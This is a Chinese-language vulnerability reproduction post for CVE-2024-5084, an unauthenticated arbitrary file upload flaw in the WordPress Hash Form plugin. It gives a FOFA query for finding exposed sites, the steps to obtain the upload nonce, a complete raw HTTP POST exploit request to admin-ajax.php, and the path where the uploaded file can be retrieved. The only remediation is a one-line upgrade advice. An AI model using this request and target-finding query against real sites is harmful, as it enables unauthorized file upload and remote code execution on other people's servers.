CVE-2024-5084漏洞复现

admin 2024年7月11日11:49:03评论195 views字数 1047阅读3分29秒阅读模式

使

01

漏洞名称

WordPress的Hash表单任意文件上传漏洞

02

漏洞影响

<= 1.1.0 版本

03

漏洞描述

WordPress的Hash表单 - 拖放表单构建器插件由于在所有版本中缺失'file_upload_action'函数中的文件类型验证,存在任意文件上传漏洞,包括1.1.0版本。这使得未经身份验证的攻击者可以在受影响站点的服务器上上传任意文件,可能导致远程代码执行。

04

FOFA搜索语句
"/wp-content/plugins/hash-form/"

CVE-2024-5084漏洞复现

05

漏洞复现

第一步,请求目标网站,从body中获取ajax_nounce的值

CVE-2024-5084漏洞复现

第二步,上传文件,路径中file_uploader_nonce用第一步获取到的值,qqfile为上传文件名5a499f6e26313e19bd4049009bbed5bd为上传文件内容

POST /wp-admin/admin-ajax.php?action=hashform_file_upload_action&file_uploader_nonce=5ec33b3537&allowedExtensions%5B0%5D=txt&sizeLimit=1048576&qqfile=YwlKW.txt HTTP/1.1 Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:78.0) Gecko/20100101 Firefox/78.0Connection: closeContent-Length: 32Content-Type: application/x-www-form-urlencodedCookie: request_a_quote_user_coockie=668e50f1d574c; PHPSESSID=6ltqhpjj2f7ciavd9s8dvh1i0eAccept-Encoding: gzip5a499f6e26313e19bd4049009bbed5bd

第三步,查看回显文件

http://x.x.x.x/wp-content/uploads/hashform/temp/YwlKW.txt

CVE-2024-5084漏洞复现

漏洞复现成功

07

修复建议

升级到最新版本。

原文始发于微信公众号(AI与网安):CVE-2024-5084漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月11日11:49:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-5084漏洞复现http://cn-sec.com/archives/2941421.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息